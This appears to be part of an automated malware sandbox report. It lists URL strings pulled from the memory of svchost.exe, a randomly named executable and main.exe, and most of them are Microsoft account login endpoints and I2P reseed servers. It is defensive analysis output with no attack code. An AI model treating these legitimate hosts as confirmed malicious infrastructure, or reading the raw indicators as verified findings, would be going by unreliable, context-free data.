Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262816840.000001D378AED000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 0000001F.00000002.3263875376.000001D3798C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/RST2.srfA7826
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/didtou.srfs.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263129207.000001D379337000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsec
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfuerP
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfD
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 0000001F.00000003.3156260035.000001D37935A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263426432.000001D37984A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-Dh1
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263588064.000001D379883000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023950758.000001D379357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023782849.000001D37935A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263875376.000001D3798C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfI
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262697506.000001D378ABC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf:CLSID
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfU
Source: svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srfU
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srfToken
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 0000001F.00000003.3023767682.000001D379310000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfRE
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.dr | String found in binary or memory: https://netdb.i2p2.no/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | String found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://reseed-fr.i2pd.xyz/#
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://reseed-fr.i2pd.xyz/p
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | String found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: main.exe, 00000016.00000003.2484244836.00000223506CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://reseed-pl.i2pd.xyz/i2pseeds.su3
Source: main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz/i2pseeds.su30
Source: main.exe, 00000016.00000003.2484244836.00000223506CE000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz:443/i2pseeds.su3
Source: main.exe, 00000016.00000003.2494432573.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed-pl.i2pd.xyz:443/i2pseeds.su3T
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.diva.exchange/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.diva.exchange/b.c
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: https://reseed.i2p-projekt.de/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.i2pgit.org/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/P#
Source: main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/i2pseeds.su3
Source: main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org/i2pseeds.su30
Source: main.exe, 00000016.00000003.2503133983.00000223506CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.i2pgit.org:443/i2pseeds.su3
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.memcpy.io/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.memcpy.io/hP#
Source: main.exe, 00000016.00000003.2471943070.000002235030D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471338802.0000022350309000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471413512.000002235030B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.memcpy.io:443/i2pseeds.su3
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.onion.im/
Source: main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.onion.im/i2pseeds.su3
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed.stormycloud.org/
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/&
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/7
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/??
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reseed.stormycloud.org/b.c
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.drString found in binary or memory: https://reseed2.i2p.net/
Source: svchost.exe, 0000001F.00000003.3023799636.000001D379355000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
